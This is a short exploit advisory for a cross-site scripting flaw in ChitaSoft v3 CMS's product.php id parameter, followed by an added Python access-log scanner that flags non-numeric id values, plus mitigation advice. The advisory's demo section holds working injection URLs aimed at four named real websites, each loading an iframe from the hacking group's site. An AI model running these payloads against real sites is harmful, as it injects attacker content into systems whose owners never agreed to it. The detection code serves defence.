######################
# Exploit Title : ChitaSoft v3 CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.chitasoft.com/products/3
# Author Homepage : http://www.persian-team.ir
# Date: 2016/04/15
# Version : 3
######################
# PoC:
# product.php?id=[XSS]
# Payload = '>
# Demo:
# http://www.javdanesho.com/product.php?id=149%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.dafpublishingco.com/product.php?id=121%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.nashredaf.com/product.php?id=99%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.iranmodiran.com/product.php?id=1%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : FireKernel And Milad_Hacking
# Homepage : http://www.persian-team.ir
######################
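
A defender-side check for the request pattern this advisory describes, as an added example that is not part of the original advisory: it scans access-log lines for `product.php` requests whose `id` value is not a plain integer after percent-decoding. The combined log format, the expectation that `id` is numeric (inferred from the demo URLs), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"[0-9]+")  # assumption: a legitimate id is a plain integer


def suspicious_id(url):
    """Return the decoded id value if a product.php request carries a
    non-numeric id, otherwise None."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed request target: nothing to parse here
        return None
    if not parts.path.lower().endswith("/product.php"):
        return None
    # parse_qs percent-decodes once, so %27%3E becomes '> before the check;
    # double-encoded input still contains '%' and is flagged as well.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if not NUMERIC_ID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_id) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_id(match.group(1))
            if value is not None:
                hits.append((number, value))
    return hits


# Constructed sample log lines (documentation IP ranges, harmless marker text).
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Apr/2016:10:00:01 +0000] "GET /product.php?id=149 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Apr/2016:10:00:07 +0000] "GET /product.php?id=149%27%3Etest HTTP/1.1" 200 5184',
    '203.0.113.9 - - [15/Apr/2016:10:00:09 +0000] "GET /product.php?id=121%2527%253E HTTP/1.1" 200 5130',
    '198.51.100.2 - - [15/Apr/2016:10:01:00 +0000] "GET /index.php?id=%27%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric id {value!r}")
```

The same numeric-only rule is the natural server-side mitigation: reject or cast `id` before it is used, and HTML-encode it wherever it is written back into the page.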